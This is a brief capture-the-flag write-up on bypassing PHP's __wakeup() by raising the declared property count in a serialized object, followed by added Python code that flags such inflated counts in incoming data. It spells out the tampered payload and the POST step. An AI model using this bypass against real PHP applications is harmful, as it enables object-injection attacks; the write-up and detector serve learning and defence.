__wakeup(): it is called immediately after deserialization.
Vulnerability principle:
When a string is deserialized, if the number of properties it declares is greater than the number of properties actually present, execution of __wakeup() is skipped.
Reference Title: xctf-unserialize3
For this problem, the xctf class has a flag variable and calls __wakeup(), so first consider serializing an instance of the xctf class and its variable. Guess that the intention is to submit the serialized result in a POST request after code=.
<?php
class xctf {
    public $flag = '111';
    public function __wakeup() {
        exit('bad requests');
    }
}
$a = new xctf();
echo(serialize($a));
?>
// serialized output is:
// O:4:"xctf":1:{s:4:"flag";s:3:"111";}
Submitting this result as-is executes __wakeup(), which outputs 'bad requests' and exits the script, so the vulnerability is used to bypass __wakeup().
Change the number in the serialized string that represents the property count to a value greater than the true count, send the POST request, and get the result.
got the answer.
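As an added example (my own code, not part of the write-up), a defender-side check that can be run on a request parameter before it reaches unserialize(): it parses PHP's serialize() format and reports every object whose declared property count differs from the properties actually present, which is exactly the inconsistency the bypass above relies on. The function names audit and _scan and the sample strings are my own.

```python
def _scan(s: bytes, i: int, findings: list) -> int:
    """Parse one serialized value beginning at s[i]; return the index just past it.
    Objects whose declared property count != actual count are added to findings."""
    t = chr(s[i])
    if t == 'N':                                   # N;
        return i + 2
    if t in 'ibd':                                 # i:1;  b:1;  d:1.5;
        return s.index(b';', i) + 1
    if t == 's':                                   # s:<len>:"<bytes>";
        j = s.index(b':', i + 2)
        n = int(s[i + 2:j])                        # <len> counts bytes, not characters
        return j + n + 4                           # skip ':' '"' <bytes> '"' ';'
    if t in 'aO':                                  # a:<n>:{...}  O:<l>:"<class>":<n>:{...}
        name = None
        j = i + 1                                  # ':' just before the count
        if t == 'O':
            j0 = s.index(b':', i + 2)
            ln = int(s[i + 2:j0])
            name = s[j0 + 2:j0 + 2 + ln].decode()
            j = j0 + 3 + ln
        k = s.index(b':', j + 1)
        declared = int(s[j + 1:k])
        if s[k + 1:k + 2] != b'{':
            raise ValueError(f"expected '{{' at offset {k + 1}")
        pos, actual = k + 2, 0
        while s[pos:pos + 1] != b'}':
            pos = _scan(s, pos, findings)          # key
            pos = _scan(s, pos, findings)          # value
            actual += 1
        if name is not None and declared != actual:
            findings.append((name, declared, actual))
        return pos + 1
    raise ValueError(f"unsupported type {t!r} at offset {i}")


def audit(serialized: str) -> list:
    """Return [(class, declared, actual), ...] for every object with an
    inconsistent property count; an empty list means the counts all match."""
    s = serialized.encode()
    findings: list = []
    if _scan(s, 0, findings) != len(s):
        raise ValueError("trailing data after serialized value")
    return findings


# Constructed inputs: the normal output of the script above, and the same
# string with the property count raised from 1 to 2.
NORMAL = 'O:4:"xctf":1:{s:4:"flag";s:3:"111";}'
INFLATED = 'O:4:"xctf":2:{s:4:"flag";s:3:"111";}'

if __name__ == "__main__":
    print(audit(NORMAL))      # []
    print(audit(INFLATED))    # [('xctf', 2, 1)]
```

The check also descends into arrays, so an inflated object nested inside an array is reported as well; the skipped-__wakeup() behaviour itself was fixed in later PHP releases, so on current versions this is a detection rule for tampered input rather than a substitute for patching.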